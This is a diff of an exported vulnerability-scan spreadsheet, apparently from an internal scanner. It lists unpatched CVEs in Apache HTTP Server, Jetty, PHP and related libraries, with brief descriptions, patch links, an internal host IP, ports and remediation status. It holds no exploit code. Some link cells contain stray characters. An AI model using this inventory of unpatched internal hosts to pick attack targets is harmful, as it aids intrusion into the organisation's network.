--- a/tmp/exports/vuln_测试001_2026-05-31_2026-06-29.xlsx
+++ b/tmp/exports/vuln_测试001_2026-05-31_2026-06-29.xlsx
@@ -1801,7 +1801,7 @@
     <row r="12">
       <c r="A12" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2022-23943)</t>
+          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
         </is>
       </c>
       <c r="B12" t="inlineStr">
@@ -1816,18 +1816,18 @@
       </c>
       <c r="D12" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>other environmental issues</t>
         </is>
       </c>
       <c r="E12" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F12" t="inlineStr">
         <is>
           <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 2.4 版本 2.4.52 和之前版本的 mod_sed 中存在缓冲区错误漏洞，该漏洞允许攻击者使用攻击者提供的数据覆盖堆内存。</t>
+Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
         </is>
       </c>
       <c r="G12" t="inlineStr">
@@ -1847,7 +1847,7 @@
       </c>
       <c r="J12" t="inlineStr">
         <is>
-          <t>CVE-2022-23943</t>
+          <t>CVE-2022-22720</t>
         </is>
       </c>
       <c r="K12" t="inlineStr">
@@ -1922,7 +1922,7 @@
     <row r="13">
       <c r="A13" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
+          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2022-23943)</t>
         </is>
       </c>
       <c r="B13" t="inlineStr">
@@ -1937,18 +1937,18 @@
       </c>
       <c r="D13" t="inlineStr">
         <is>
-          <t>other environmental issues</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E13" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F13" t="inlineStr">
         <is>
           <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
+Apache HTTP Server 2.4 版本 2.4.52 和之前版本的 mod_sed 中存在缓冲区错误漏洞，该漏洞允许攻击者使用攻击者提供的数据覆盖堆内存。</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
@@ -1968,7 +1968,7 @@
       </c>
       <c r="J13" t="inlineStr">
         <is>
-          <t>CVE-2022-22720</t>
+          <t>CVE-2022-23943</t>
         </is>
       </c>
       <c r="K13" t="inlineStr">
@@ -3609,7 +3609,7 @@
     <row r="27">
       <c r="A27" t="inlineStr">
         <is>
-          <t>Eclipse Jetty Http请求走私漏洞(CVE-2017-7657)</t>
+          <t>Eclipse Jetty Server 环境问题漏洞(CVE-2017-7658)</t>
         </is>
       </c>
       <c r="B27" t="inlineStr">
@@ -3629,13 +3629,13 @@
       </c>
       <c r="E27" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
+https://bugs.eclipse.org/bugs/show_bug.cgi?id=535669</t>
         </is>
       </c>
       <c r="F27" t="inlineStr">
         <is>
-          <t>Eclipse Jetty是Eclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。 Eclipse Jetty 9.2.x及之前版本、9.3.x版本和9.4.x版本中块长度的解析存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。</t>
+          <t>Eclipse Jetty Server存在环境问题漏洞。攻击者可借助特制的请求利用该漏洞绕过授权。</t>
         </is>
       </c>
       <c r="G27" t="inlineStr">
@@ -3655,7 +3655,7 @@
       </c>
       <c r="J27" t="inlineStr">
         <is>
-          <t>CVE-2017-7657</t>
+          <t>CVE-2017-7658</t>
         </is>
       </c>
       <c r="K27" t="inlineStr">
@@ -3730,7 +3730,7 @@
     <row r="28">
       <c r="A28" t="inlineStr">
         <is>
-          <t>Eclipse Jetty Server 环境问题漏洞(CVE-2017-7658)</t>
+          <t>Eclipse Jetty Http请求走私漏洞(CVE-2017-7657)</t>
         </is>
       </c>
       <c r="B28" t="inlineStr">
@@ -3750,13 +3750,13 @@
       </c>
       <c r="E28" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
-https://bugs.eclipse.org/bugs/show_bug.cgi?id=535669</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668</t>
         </is>
       </c>
       <c r="F28" t="inlineStr">
         <is>
-          <t>Eclipse Jetty Server存在环境问题漏洞。攻击者可借助特制的请求利用该漏洞绕过授权。</t>
+          <t>Eclipse Jetty是Eclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。 Eclipse Jetty 9.2.x及之前版本、9.3.x版本和9.4.x版本中块长度的解析存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -3776,7 +3776,7 @@
       </c>
       <c r="J28" t="inlineStr">
         <is>
-          <t>CVE-2017-7658</t>
+          <t>CVE-2017-7657</t>
         </is>
       </c>
       <c r="K28" t="inlineStr">
@@ -10259,7 +10259,7 @@
     <row r="82">
       <c r="A82" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
+          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
         </is>
       </c>
       <c r="B82" t="inlineStr">
@@ -10274,18 +10274,18 @@
       </c>
       <c r="D82" t="inlineStr">
         <is>
-          <t>other environmental issues</t>
+          <t>Authentication Vulnerability</t>
         </is>
       </c>
       <c r="E82" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F82" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
+          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
         </is>
       </c>
       <c r="G82" t="inlineStr">
@@ -10305,7 +10305,7 @@
       </c>
       <c r="J82" t="inlineStr">
         <is>
-          <t>CVE-2022-22720</t>
+          <t>CVE-2022-31813</t>
         </is>
       </c>
       <c r="K82" t="inlineStr">
@@ -10380,7 +10380,7 @@
     <row r="83">
       <c r="A83" t="inlineStr">
         <is>
-          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
+          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
         </is>
       </c>
       <c r="B83" t="inlineStr">
@@ -10395,18 +10395,18 @@
       </c>
       <c r="D83" t="inlineStr">
         <is>
-          <t>Authentication Vulnerability</t>
+          <t>other environmental issues</t>
         </is>
       </c>
       <c r="E83" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F83" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
+Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
         </is>
       </c>
       <c r="G83" t="inlineStr">
@@ -10426,7 +10426,7 @@
       </c>
       <c r="J83" t="inlineStr">
         <is>
-          <t>CVE-2022-31813</t>
+          <t>CVE-2022-22720</t>
         </is>
       </c>
       <c r="K83" t="inlineStr">
@@ -10621,7 +10621,7 @@
     <row r="85">
       <c r="A85" t="inlineStr">
         <is>
-          <t>Apache 安全漏洞(CVE-2021-26691)</t>
+          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
         </is>
       </c>
       <c r="B85" t="inlineStr">
@@ -10641,12 +10641,12 @@
       </c>
       <c r="E85" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F85" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
+          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
         </is>
       </c>
       <c r="G85" t="inlineStr">
@@ -10666,7 +10666,7 @@
       </c>
       <c r="J85" t="inlineStr">
         <is>
-          <t>CVE-2021-26691</t>
+          <t>CVE-2021-39275</t>
         </is>
       </c>
       <c r="K85" t="inlineStr">
@@ -10741,7 +10741,7 @@
     <row r="86">
       <c r="A86" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
+          <t>Apache 安全漏洞(CVE-2021-26691)</t>
         </is>
       </c>
       <c r="B86" t="inlineStr">
@@ -10761,12 +10761,12 @@
       </c>
       <c r="E86" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
         </is>
       </c>
       <c r="F86" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
+          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
         </is>
       </c>
       <c r="G86" t="inlineStr">
@@ -10786,7 +10786,7 @@
       </c>
       <c r="J86" t="inlineStr">
         <is>
-          <t>CVE-2021-39275</t>
+          <t>CVE-2021-26691</t>
         </is>
       </c>
       <c r="K86" t="inlineStr">
@@ -11826,7 +11826,7 @@
     <row r="95">
       <c r="A95" t="inlineStr">
         <is>
-          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
+          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
         </is>
       </c>
       <c r="B95" t="inlineStr">
@@ -11841,18 +11841,18 @@
       </c>
       <c r="D95" t="inlineStr">
         <is>
-          <t>Authentication Vulnerability</t>
+          <t>other environmental issues</t>
         </is>
       </c>
       <c r="E95" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F95" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
+Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
         </is>
       </c>
       <c r="G95" t="inlineStr">
@@ -11872,7 +11872,7 @@
       </c>
       <c r="J95" t="inlineStr">
         <is>
-          <t>CVE-2022-31813</t>
+          <t>CVE-2022-22720</t>
         </is>
       </c>
       <c r="K95" t="inlineStr">
@@ -11947,7 +11947,7 @@
     <row r="96">
       <c r="A96" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
+          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
         </is>
       </c>
       <c r="B96" t="inlineStr">
@@ -11962,18 +11962,18 @@
       </c>
       <c r="D96" t="inlineStr">
         <is>
-          <t>other environmental issues</t>
+          <t>Authentication Vulnerability</t>
         </is>
       </c>
       <c r="E96" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F96" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
+          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
         </is>
       </c>
       <c r="G96" t="inlineStr">
@@ -11993,7 +11993,7 @@
       </c>
       <c r="J96" t="inlineStr">
         <is>
-          <t>CVE-2022-22720</t>
+          <t>CVE-2022-31813</t>
         </is>
       </c>
       <c r="K96" t="inlineStr">
@@ -12068,7 +12068,7 @@
     <row r="97">
       <c r="A97" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 服务端请求伪造漏洞(CVE-2021-40438)</t>
+          <t>Apache 安全漏洞(CVE-2021-26691)</t>
         </is>
       </c>
       <c r="B97" t="inlineStr">
@@ -12083,22 +12083,22 @@
       </c>
       <c r="D97" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E97" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://access.redhat.com/security/cve/cve-2021-40438</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
         </is>
       </c>
       <c r="F97" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server存在代码问题漏洞，该漏洞是由于系统对用户的输入没有进行严格的过滤导致，攻击者可以构造恶意数据对目标服务器进行SSRF攻击。该漏洞可做为攻击目标服务器内网的跳板，以此对服务器所在内网进行端口扫描、攻击运行在内网的应用程序、下载内网资源等。</t>
+          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
         </is>
       </c>
       <c r="G97" t="inlineStr">
         <is>
-          <t>Active Vuln、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
+          <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
       <c r="H97" t="inlineStr">
@@ -12113,7 +12113,7 @@
       </c>
       <c r="J97" t="inlineStr">
         <is>
-          <t>CVE-2021-40438</t>
+          <t>CVE-2021-26691</t>
         </is>
       </c>
       <c r="K97" t="inlineStr">
@@ -12308,7 +12308,7 @@
     <row r="99">
       <c r="A99" t="inlineStr">
         <is>
-          <t>Apache 安全漏洞(CVE-2021-26691)</t>
+          <t>Apache HTTP Server 服务端请求伪造漏洞(CVE-2021-40438)</t>
         </is>
       </c>
       <c r="B99" t="inlineStr">
@@ -12323,22 +12323,22 @@
       </c>
       <c r="D99" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E99" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://access.redhat.com/security/cve/cve-2021-40438</t>
         </is>
       </c>
       <c r="F99" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server存在代码问题漏洞，该漏洞是由于系统对用户的输入没有进行严格的过滤导致，攻击者可以构造恶意数据对目标服务器进行SSRF攻击。该漏洞可做为攻击目标服务器内网的跳板，以此对服务器所在内网进行端口扫描、攻击运行在内网的应用程序、下载内网资源等。</t>
         </is>
       </c>
       <c r="G99" t="inlineStr">
         <is>
-          <t>Vuln with Attack Code Disclosure</t>
+          <t>Active Vuln、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
         </is>
       </c>
       <c r="H99" t="inlineStr">
@@ -12353,7 +12353,7 @@
       </c>
       <c r="J99" t="inlineStr">
         <is>
-          <t>CVE-2021-26691</t>
+          <t>CVE-2021-40438</t>
         </is>
       </c>
       <c r="K99" t="inlineStr">
@@ -14478,7 +14478,7 @@
     <row r="117">
       <c r="A117" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
+          <t>Apache 安全漏洞(CVE-2021-26691)</t>
         </is>
       </c>
       <c r="B117" t="inlineStr">
@@ -14498,12 +14498,12 @@
       </c>
       <c r="E117" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
         </is>
       </c>
       <c r="F117" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
+          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
         </is>
       </c>
       <c r="G117" t="inlineStr">
@@ -14523,7 +14523,7 @@
       </c>
       <c r="J117" t="inlineStr">
         <is>
-          <t>CVE-2021-39275</t>
+          <t>CVE-2021-26691</t>
         </is>
       </c>
       <c r="K117" t="inlineStr">
@@ -14718,7 +14718,7 @@
     <row r="119">
       <c r="A119" t="inlineStr">
         <is>
-          <t>Apache 安全漏洞(CVE-2021-26691)</t>
+          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
         </is>
       </c>
       <c r="B119" t="inlineStr">
@@ -14738,12 +14738,12 @@
       </c>
       <c r="E119" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://downloads.apache.org/httpd/Announcement2.4.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F119" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 存在缓冲区错误漏洞，该漏洞允许远程攻击者可利用该漏洞执行拒绝服务(DoS)攻击。</t>
+          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
         </is>
       </c>
       <c r="G119" t="inlineStr">
@@ -14763,7 +14763,7 @@
       </c>
       <c r="J119" t="inlineStr">
         <is>
-          <t>CVE-2021-26691</t>
+          <t>CVE-2021-39275</t>
         </is>
       </c>
       <c r="K119" t="inlineStr">
@@ -15814,7 +15814,7 @@
     <row r="128">
       <c r="A128" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8386)</t>
+          <t>PHP 安全漏洞(CVE-2015-8383)</t>
         </is>
       </c>
       <c r="B128" t="inlineStr">
@@ -15829,17 +15829,17 @@
       </c>
       <c r="D128" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E128" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/3b63d12038c8d8fc278e81c942fa9bec7c704c8b</t>
         </is>
       </c>
       <c r="F128" t="inlineStr">
         <is>
-          <t>8.38之前的PCRE处理了后置断言和相互​​递归子模式的交互，这使远程攻击者可以通过精心制作的正则表达式导致拒绝服务（缓冲区溢出）或可能产生未指定的其他影响，如Konqueror遇到的JavaScript RegExp对象所证明的那样</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理重复的条件组。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（缓冲区溢出）。</t>
         </is>
       </c>
       <c r="G128" t="inlineStr">
@@ -15859,7 +15859,7 @@
       </c>
       <c r="J128" t="inlineStr">
         <is>
-          <t>CVE-2015-8386</t>
+          <t>CVE-2015-8383</t>
         </is>
       </c>
       <c r="K128" t="inlineStr">
@@ -15934,7 +15934,7 @@
     <row r="129">
       <c r="A129" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8383)</t>
+          <t>PHP 安全漏洞(CVE-2015-8386)</t>
         </is>
       </c>
       <c r="B129" t="inlineStr">
@@ -15949,17 +15949,17 @@
       </c>
       <c r="D129" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E129" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/3b63d12038c8d8fc278e81c942fa9bec7c704c8b</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
         </is>
       </c>
       <c r="F129" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理重复的条件组。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（缓冲区溢出）。</t>
+          <t>8.38之前的PCRE处理了后置断言和相互​​递归子模式的交互，这使远程攻击者可以通过精心制作的正则表达式导致拒绝服务（缓冲区溢出）或可能产生未指定的其他影响，如Konqueror遇到的JavaScript RegExp对象所证明的那样</t>
         </is>
       </c>
       <c r="G129" t="inlineStr">
@@ -15979,7 +15979,7 @@
       </c>
       <c r="J129" t="inlineStr">
         <is>
-          <t>CVE-2015-8383</t>
+          <t>CVE-2015-8386</t>
         </is>
       </c>
       <c r="K129" t="inlineStr">
@@ -17379,25 +17379,145 @@
     <row r="141">
       <c r="A141" t="inlineStr">
         <is>
+          <t>Oniguruma PHP 缓冲区错误漏洞(CVE-2017-9225)</t>
+        </is>
+      </c>
+      <c r="B141" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C141" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D141" t="inlineStr">
+        <is>
+          <t>Buffer Overflow</t>
+        </is>
+      </c>
+      <c r="E141" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接:https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
+        </is>
+      </c>
+      <c r="F141" t="inlineStr">
+        <is>
+          <t>Oniguruma是一款开源的正则表达式库。 Oniguruma 6.2.0存在缓冲区错误漏洞。该漏洞源于在 Ruby 中的 Oniguruma-mod 到 2.4.1 和 PHP 中的 mbstring 到 7.1.5 中使用。 在正则表达式编译期间，在 next_state_val() 中发生堆越界写入或读取。 大于 0xff 的八进制数在 fetch_token() 和 fetch_token_in_cc() 中无法正确处理。 包含 '700' 形式的八进制数的格式错误的正则表达式将在 next_state_val() 中生成大于 0xff 的无效代码点值，从而导致越界写入内存损坏。攻击者可利用该漏洞造成拒绝服务（栈越边界写入）。</t>
+        </is>
+      </c>
+      <c r="G141" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
+      <c r="H141" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I141" t="inlineStr">
+        <is>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J141" t="inlineStr">
+        <is>
+          <t>CVE-2017-9225</t>
+        </is>
+      </c>
+      <c r="K141" t="inlineStr">
+        <is>
+          <t>2026-06-26 08:05:39</t>
+        </is>
+      </c>
+      <c r="L141" t="inlineStr">
+        <is>
+          <t>2026-06-26 02:38:57</t>
+        </is>
+      </c>
+      <c r="M141" t="inlineStr">
+        <is>
+          <t>10.128.165.151</t>
+        </is>
+      </c>
+      <c r="N141" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O141" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P141" t="inlineStr"/>
+      <c r="Q141" t="inlineStr"/>
+      <c r="R141" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S141" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T141" t="inlineStr">
+        <is>
+          <t>未托管</t>
+        </is>
+      </c>
+      <c r="U141" t="inlineStr">
+        <is>
+          <t>8090</t>
+        </is>
+      </c>
+      <c r="V141" t="inlineStr"/>
+      <c r="W141" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X141" t="inlineStr">
+        <is>
+          <t>组件及版本: PHP:5.6.13</t>
+        </is>
+      </c>
+      <c r="Y141" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z141" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="142">
+      <c r="A142" t="inlineStr">
+        <is>
           <t>PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)</t>
         </is>
       </c>
-      <c r="B141" t="inlineStr">
+      <c r="B142" t="inlineStr">
         <is>
           <t>尽快修复</t>
         </is>
       </c>
-      <c r="C141" t="inlineStr">
+      <c r="C142" t="inlineStr">
         <is>
           <t>严重</t>
         </is>
       </c>
-      <c r="D141" t="inlineStr">
+      <c r="D142" t="inlineStr">
         <is>
           <t>Code Execution</t>
         </is>
       </c>
-      <c r="E141" t="inlineStr">
+      <c r="E142" t="inlineStr">
         <is>
           <t>将PHP升级到官方最新版本 8.3.8、8.2.20和8.1.29。下载链接：https://www.php.net/downloads.php
 缓解方案：
@@ -17415,149 +17535,29 @@
 # ScriptAlias /php-cgi/ "C:/xampp/php/"</t>
         </is>
       </c>
-      <c r="F141" t="inlineStr">
+      <c r="F142" t="inlineStr">
         <is>
           <t>PHP语言在设计时忽略了Windows对字符编码转换的 Best-Fit 特性，导致未授权的攻击者可以通过特定字符串绕过 CVE-2012-1823 补丁，执行任意PHP代码，导致服务器失陷。</t>
         </is>
       </c>
-      <c r="G141" t="inlineStr">
+      <c r="G142" t="inlineStr">
         <is>
           <t>Hot Exploit、Vuln with Attack Code Disclosure、Ransomware Exploit、Virus Exploit、Active Vuln</t>
         </is>
       </c>
-      <c r="H141" t="inlineStr">
+      <c r="H142" t="inlineStr">
         <is>
           <t>云镜</t>
         </is>
       </c>
-      <c r="I141" t="inlineStr">
+      <c r="I142" t="inlineStr">
         <is>
           <t>版本比对</t>
         </is>
       </c>
-      <c r="J141" t="inlineStr">
+      <c r="J142" t="inlineStr">
         <is>
           <t>CVE-2024-4577</t>
-        </is>
-      </c>
-      <c r="K141" t="inlineStr">
-        <is>
-          <t>2026-06-26 08:05:39</t>
-        </is>
-      </c>
-      <c r="L141" t="inlineStr">
-        <is>
-          <t>2026-06-26 02:38:57</t>
-        </is>
-      </c>
-      <c r="M141" t="inlineStr">
-        <is>
